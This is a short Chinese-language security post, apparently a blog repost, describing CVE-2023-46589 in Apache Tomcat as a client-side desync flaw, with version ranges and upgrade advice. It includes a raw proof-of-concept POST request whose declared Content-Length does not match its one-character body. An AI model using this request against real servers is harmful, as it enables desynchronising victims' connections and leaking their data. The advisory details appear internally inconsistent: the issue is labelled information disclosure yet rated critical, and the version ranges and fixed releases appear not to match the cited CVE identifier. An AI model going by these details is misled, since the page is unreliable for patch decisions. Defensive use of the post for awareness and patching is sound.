CVE-2023-46589 Apache Tomcat - 信息泄露

2024-02-06 17:56:40 浏览数 (2)

Apache Tomcat 从 8.5.7 到 8.5.63、从 9.0.0-M11 到 9.0.43 容易受到客户端不同步攻击。

当 Web 服务器无法正确处理 POST 请求的内容长度时,就会出现客户端不同步 (CSD) 漏洞。通过利用此行为,攻击者可以强制受害者的浏览器取消与网站的连接同步,从而导致敏感数据从服务器和/或客户端连接中走私。

严重性:严重

受影响的版本:Apache Tomcat 9.0.0-M11 至 9.0.43Apache Tomcat 8.5.7 至 8.5.63

建议用户升级到8.5.64或9.0.44以上版本,其中包含该问题的修复。

代码语言:javascript复制
缓解措施:
- 升级到 Apache Tomcat 9.0.44 或更高版本
- 升级到 Apache Tomcat 8.5.64 或更高版本
代码语言:text复制

POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded

X

0 人点赞